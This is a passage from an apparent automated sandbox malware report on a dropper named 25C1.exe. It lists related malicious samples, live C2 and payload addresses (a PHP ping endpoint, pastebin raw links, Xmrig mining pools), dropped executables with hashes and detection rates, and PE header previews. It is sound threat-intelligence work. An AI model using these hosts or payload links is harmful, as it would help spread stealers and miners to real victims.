                              • 185.172.128.90/cpa/ping.php?substr=one&s=two
                              104.20.3.235New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              51.15.58.2248EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                                file.exeGet hashmaliciousGlupteba, SmokeLoader, XmrigBrowse
                                  file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                    file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                      file.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                        file.exeGet hashmaliciousXmrigBrowse
                                          file.exeGet hashmaliciousXmrigBrowse
                                            file.exeGet hashmaliciousXmrigBrowse
                                              file.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                file.exeGet hashmaliciousXmrigBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  pastebin.com88YW43jlqt.exeGet hashmaliciousDCRatBrowse
                                                  • 172.67.19.24
                                                  installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                  • 104.20.3.235
                                                  aabJ5lAG3l.docGet hashmaliciousUnknownBrowse
                                                  • 104.20.3.235
                                                  updater.exeGet hashmaliciousXmrigBrowse
                                                  • 104.20.4.235
                                                  DeqcE30sLb.exeGet hashmaliciousDCRatBrowse
                                                  • 172.67.19.24
                                                  Mx0UGSI897.exeGet hashmaliciousDCRatBrowse
                                                  • 104.20.3.235
                                                  eE1xnwas4F.exeGet hashmaliciousLummaCBrowse
                                                  • 104.20.3.235
                                                  conhost.exeGet hashmaliciousXmrigBrowse
                                                  • 104.20.3.235
                                                  SecuriteInfo.com.Win64.Evo-gen.29709.21053.exeGet hashmaliciousUnknownBrowse
                                                  • 104.20.3.235
                                                  Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
                                                  • 172.67.19.24
                                                  xmr-eu1.nanopool.orgfile.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                  • 54.37.137.114
                                                  Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                                                  • 212.47.253.124
                                                  updater.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.23.83
                                                  SecuriteInfo.com.Win64.RATX-gen.29355.29242.exeGet hashmaliciousAsyncRAT, Nbminer, XmrigBrowse
                                                  • 54.37.232.103
                                                  serrrr.exeGet hashmaliciousXmrigBrowse
                                                  • 51.15.193.130
                                                  2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                                                  • 212.47.253.124
                                                  gq83mrprwy.exeGet hashmaliciousXmrigBrowse
                                                  • 212.47.253.124
                                                  SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                                  • 51.15.193.130
                                                  ft1i6jvAdD.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.23.83
                                                  vS3C07uH19.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, XmrigBrowse
                                                  • 51.255.34.118
                                                  xmr-eu2.nanopool.orgMCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                  • 51.195.43.17
                                                  zg9ZjvXyS0.exeGet hashmaliciousXmrigBrowse
                                                  • 51.255.34.80
                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoader, XmrigBrowse
                                                  • 51.15.61.114
                                                  754VzzNQIU.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoader, XmrigBrowse
                                                  • 92.222.217.165
                                                  rZN9Qy7WJN.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoader, XmrigBrowse
                                                  • 51.15.55.100
                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoader, XmrigBrowse
                                                  • 51.15.55.162
                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoader, XmrigBrowse
                                                  • 51.15.67.17
                                                  ChromeUA.exeGet hashmaliciousXmrigBrowse
                                                  • 92.222.217.165
                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                  • 152.228.216.245
                                                  file.exeGet hashmaliciousAmadey, Fabookie, Glupteba, Nymaim, SmokeLoader, XmrigBrowse
                                                  • 51.15.67.17

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  NADYMSS-ASRULOn3Ws0C6v.exeGet hashmaliciousUnknownBrowse
                                                  • 185.172.128.109
                                                  LOn3Ws0C6v.exeGet hashmaliciousUnknownBrowse
                                                  • 185.172.128.109
                                                  5oXJ4R0xsz.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  tedfd.exeGet hashmaliciousAtlantida Stealer, PureLog StealerBrowse
                                                  • 185.172.128.95
                                                  mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
                                                  • 185.172.128.33
                                                  SecuriteInfo.com.Win32.CrypterX-gen.21396.26717.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  4bMOQM5bBW.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  38vkspMDH4.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  zv0DDKbje3.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.90
                                                  kyaOzGMoxp.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  OnlineSASFRRPHbzz3JqY.exeGet hashmaliciousScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRATBrowse
                                                  • 212.47.253.124
                                                  https://agana281.xyz/garanti/Get hashmaliciousUnknownBrowse
                                                  • 51.159.84.191
                                                  yt7dW9nyJK.exeGet hashmaliciousWhiteSnake Stealer, XWormBrowse
                                                  • 51.158.147.144
                                                  0SpHek7Jd8.elfGet hashmaliciousUnknownBrowse
                                                  • 51.159.77.156
                                                  http://frhb68273ds.ikexpress.comGet hashmaliciousUnknownBrowse
                                                  • 51.159.84.191
                                                  http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                  • 51.159.84.191
                                                  http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                                  • 51.159.84.191
                                                  faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 151.115.223.78
                                                  SecuriteInfo.com.Riskware.OfferCore.702.11507.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                  • 212.129.33.59
                                                  SecuriteInfo.com.Riskware.OfferCore.5002.4698.exeGet hashmaliciousPrivateLoaderBrowse
                                                  • 212.129.33.59
                                                  NADYMSS-ASRULOn3Ws0C6v.exeGet hashmaliciousUnknownBrowse
                                                  • 185.172.128.109
                                                  LOn3Ws0C6v.exeGet hashmaliciousUnknownBrowse
                                                  • 185.172.128.109
                                                  5oXJ4R0xsz.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  tedfd.exeGet hashmaliciousAtlantida Stealer, PureLog StealerBrowse
                                                  • 185.172.128.95
                                                  mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
                                                  • 185.172.128.33
                                                  SecuriteInfo.com.Win32.CrypterX-gen.21396.26717.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  4bMOQM5bBW.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  38vkspMDH4.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  zv0DDKbje3.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.90
                                                  kyaOzGMoxp.exeGet hashmaliciousGCleaner, NymaimBrowse
                                                  • 185.172.128.69
                                                  OVHFRnJC3400-GS SICO NEW ORLEANS.pif.exeGet hashmaliciousUnknownBrowse
                                                  • 167.114.222.56
                                                  https://forms.office.com/r/tV6LkCsNt1Get hashmaliciousUnknownBrowse
                                                  • 51.75.86.98
                                                  231210-02-AgentTesla-18717f.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 51.79.21.111
                                                  231210-10-Creal-33652f.exeGet hashmaliciousCreal StealerBrowse
                                                  • 51.91.7.6
                                                  Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 167.114.222.56
                                                  REQUEST FOR QUOTATION (RFQ)-124425.scr.gz.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                  • 167.114.222.56
                                                  RPHbzz3JqY.exeGet hashmaliciousScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRATBrowse
                                                  • 146.59.154.106
                                                  UHXVupzN3tv2QqA.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 51.77.72.165
                                                  uailDN14HrnHUF8.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 51.77.72.165
                                                  getscreen-511588515.exeGet hashmaliciousUnknownBrowse
                                                  • 51.89.95.37
                                                  CLOUDFLARENETUShttps://forms.office.com/r/tV6LkCsNt1Get hashmaliciousUnknownBrowse
                                                  • 104.18.36.155
                                                  abrirpdf_45868.msiGet hashmaliciousHTMLPhisherBrowse
                                                  • 172.67.150.91
                                                  231210-10-Creal-33652f.exeGet hashmaliciousCreal StealerBrowse
                                                  • 172.67.74.152
                                                  http://www.agrimarkeurope.com/feed-commodities.Get hashmaliciousUnknownBrowse
                                                  • 188.114.96.3
                                                  231210-04-AgentTesla-38a0d6.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.137.232
                                                  NgddPMMewg.exeGet hashmaliciousCobaltStrikeBrowse
                                                  • 188.114.97.3
                                                  fLnj4EeH6V.rtfGet hashmaliciousUnknownBrowse
                                                  • 188.114.97.3
                                                  https://presentationprojectconvini.dorik.io/Get hashmaliciousUnknownBrowse
                                                  • 172.67.72.224
                                                  1f4ef767f0144f8b485bc6ef31247f6b95f68df95a649d9902f885e79408e114.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                  • 188.114.97.3
                                                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe7vMi37TpMO.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                    EGpGxFlJO8.exeGet hashmaliciousGlupteba, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                      906o5yr1NE.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                        BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                          lxGAurRKvR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                            PjgTyZiVh0.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                                                              xZnG1FFx7L.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                KWwpSm0Cec.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                  7leZRNBofA.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                    SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                      C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe7vMi37TpMO.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                        EGpGxFlJO8.exeGet hashmaliciousGlupteba, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                          906o5yr1NE.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                            BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                              lxGAurRKvR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                PjgTyZiVh0.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                                                                                  xZnG1FFx7L.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                    KWwpSm0Cec.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                      7leZRNBofA.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                        SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2654720
                                                                                          Entropy (8bit):6.545978188908966
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                          MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                          SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                          SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                          SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: 7vMi37TpMO.exe, Detection: malicious, Browse
                                                                                          • Filename: EGpGxFlJO8.exe, Detection: malicious, Browse
                                                                                          • Filename: 906o5yr1NE.exe, Detection: malicious, Browse
                                                                                          • Filename: BWV4hz5GdR.exe, Detection: malicious, Browse
                                                                                          • Filename: lxGAurRKvR.exe, Detection: malicious, Browse
                                                                                          • Filename: PjgTyZiVh0.exe, Detection: malicious, Browse
                                                                                          • Filename: xZnG1FFx7L.exe, Detection: malicious, Browse
                                                                                          • Filename: KWwpSm0Cec.exe, Detection: malicious, Browse
                                                                                          • Filename: 7leZRNBofA.exe, Detection: malicious, Browse
                                                                                          • Filename: SKHOtnHl7J.exe, Detection: malicious, Browse
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\25C1.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):425
                                                                                          Entropy (8bit):5.353683843266035
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                          Malicious:true
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2224
                                                                                          Entropy (8bit):5.354655674834519
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:CWSU4xympjgZ9tz4RIoUl8NPdMo7u1iMugeC/ZUcUyu0lhV:CLHxvCZfIfSKl3OugIt01
                                                                                          MD5:CFB43BDF28987239F0528E539CF1589D
                                                                                          SHA1:8944B8E2EDC4A27F35D811D3445322124EDC512B
                                                                                          SHA-256:BDA66CC6F9BCB3688FC8DDA7DFDC5954582F9CDE26D7A76A23B14DA99B7C492C
                                                                                          SHA-512:792FAEABAA9D5B0C5943AE64D3169A6E39F49962829DA98FF6B466737D6CC40F78EE23C5256175BBE2F1B9F3FB411CD79110C85575BA41138C5C60F33A5DD92A
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                          MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                          SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                          SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                          SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................R..............@..........

                                                                                          C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4315536
                                                                                          Entropy (8bit):7.986023355020629
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:Ox34CiKzvjm7SLtMZTm7LASnwWEuCSeZHe31O6Y/qHYq9Pei:OB4yzvjmEtMf+wT3Us6Y/qHYKB
                                                                                          MD5:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                          SHA1:CD1D1DC2C79C0EE394B72EFC264CFD54D96E1EE5
                                                                                          SHA-256:B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                                                                                          SHA-512:8755979D7383D6CB5E7D63798C9CA8B9C0FAEEC1FE81907FC75BBBB7BE6754AB7B5A09A98492A27F90E3F26951B6891C43D8ACD21414FB603CD86A4E10DAC986
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: 7vMi37TpMO.exe, Detection: malicious, Browse
                                                                                          • Filename: EGpGxFlJO8.exe, Detection: malicious, Browse
                                                                                          • Filename: 906o5yr1NE.exe, Detection: malicious, Browse
                                                                                          • Filename: BWV4hz5GdR.exe, Detection: malicious, Browse
                                                                                          • Filename: lxGAurRKvR.exe, Detection: malicious, Browse
                                                                                          • Filename: PjgTyZiVh0.exe, Detection: malicious, Browse
                                                                                          • Filename: xZnG1FFx7L.exe, Detection: malicious, Browse
                                                                                          • Filename: KWwpSm0Cec.exe, Detection: malicious, Browse
                                                                                          • Filename: 7leZRNBofA.exe, Detection: malicious, Browse
                                                                                          • Filename: SKHOtnHl7J.exe, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...&f.d.................`@..p...............p@...@...................................B......................................@.<.....A...............A..............q@...............................@.@............p@.`............................text....^@......`@................. ..`.rdata...W...p@..X...d@.............@..@.data.........@..P....@.............@....rsrc.....O...A.......A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\BroomSetup.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4979200
                                                                                          Entropy (8bit):6.419395528077673
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:90oSiZ63YBmS9+rCgpvH8la0ZxRh+caGnj8HEQUhexTUT+1d/2/Tbt:0Ula0cGwXUheabt
                                                                                          MD5:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                          SHA1:D0189CBA430F5EEA07EFE1AB4F89ADF5AE2453DB
                                                                                          SHA-256:50A46B3120DA828502EF0CABA15DEFBAD004A3ADB88E6EACF1F9604572E2D503
                                                                                          SHA-512:473DFA66A36FEED9B29A43245074141478327CE22BA7CCE512599379DCB783B4D665E2D65C5E9750B988C7ED8F6C3349A7A12D4B8B57C89840EEE6CA6E1A30CD
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^..................9..X.......9.......9...@.......................... N..................@....................<......`<..B...`A.......................<.tk............................<.....................Ll<.......<......................text...8`9......b9................. ..`.itext...;....9..<...f9............. ..`.data.........9.......9.............@....bss....`.....:..........................idata...B...`<..D...|:.............@....didata.......<.......:.............@....edata........<.......:.............@..@.tls....L.....<..........................rdata..].....<.......:.............@..@.reloc..tk....<..l....:.............@..B.rsrc........`A......<?.............@..@............. N.......K.............@..@................

                                                                                          C:\Users\user\AppData\Local\Temp\FourthX.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2654720
                                                                                          Entropy (8bit):6.545978188908966
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                          MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                          SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                          SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                          SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):2123218
                                                                                          Entropy (8bit):7.9788749010606965
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:ChrF2z0X1W34qvuyXPHcqaGqW9gwLgMyu5noEiyIJAuw:ChFdFWINS/NF9gpMR5oEfF
                                                                                          MD5:28B72E7425D6D224C060D3CF439C668C
                                                                                          SHA1:A0A14C90E32E1FFD82558F044C351AD785E4DCD8
                                                                                          SHA-256:460BA492FBC3163B80BC40813D840E50FEB84166DB7A300392669AFD21132D98
                                                                                          SHA-512:3E0696B4135F3702DA054B80D98A8485FB7F3002C4148A327BC790B0D33C62D442C01890CC047AF19A17A149C8C8EB84777C4FF313C95EC6AF64A8BF0B2D54B6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................P............@..........................................P..(............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...(....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bnih4el.wvo.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2awxrapw.l3b.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
